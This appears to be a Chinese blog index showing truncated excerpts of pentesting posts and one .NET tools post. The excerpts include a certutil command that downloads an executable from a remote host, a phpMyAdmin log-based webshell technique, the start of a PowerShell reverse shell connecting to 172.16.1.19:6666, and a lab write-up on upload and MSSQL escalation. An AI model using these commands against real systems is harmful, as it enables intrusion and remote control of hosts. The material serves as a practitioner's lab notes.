Loading...
写在开始最近搞网安渗透比较多,这里列举一下常用的一些命令,用于备忘下载文件在windows上下载文件用的命令certutil.exe -urlcache -split -f http://172.16.1.28:2020/a.exe a.exe一句话木马在phpMyAdmin中写一句话木马的一种方法,是写在phpMyAdmin的日志里show variables like '%general...
写在开始下面说一下一些渗透SpringBoot时使用的BurpSuite插件和寻找漏洞的思路,主要是找特定文件来找一些泄漏的配置操作过程安装OneScan和HaE点到OneScan的Dashboard里,点开Listen Proxy Message然后Payload里Clear然后Paste一些判断/api/swagger.json /v2/swagger.json /api/swagg...
写在开始之前发现了一个纯靠PowerShell就能弹Shell的方式,特地记录一下使用方式原理是调用C#的库,建立TCP连接代码如下$client = New-Object System.Net.Sockets.TCPClient('172.16.1.19', 6666); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535 | ...
写在开始这是一个有后台上传和mssql提权的一个靶机的Write Up过程首先用nmap扫一下这个机器发现开了一个1433端口的mssql和27689端口的http服务器,首先登录这个http服务器看里面的情况。发现是个文件上传下载系统,而且好像是个aspx的服务。用dirsearch扫一下网站发现有个web.config.bak文件,下载下来看看内容拿到一个数据库用户名密码还有数据库名称用...
写在开始这里写一下我在开发过程中用到的一些工具和库工具转换工具XML转C#类的工具网址: https://json2csharp.com/code-converters/xml-to-csharp这是一个在线工具,可以拿来把一个成品的XML文档转换成C#用的映射类库调度Coravel一个零配置的定时任务库和任务调度器,主要是用起来比较简单,不需要配置啥配置文件,适合轻量使用的环境。网址: h...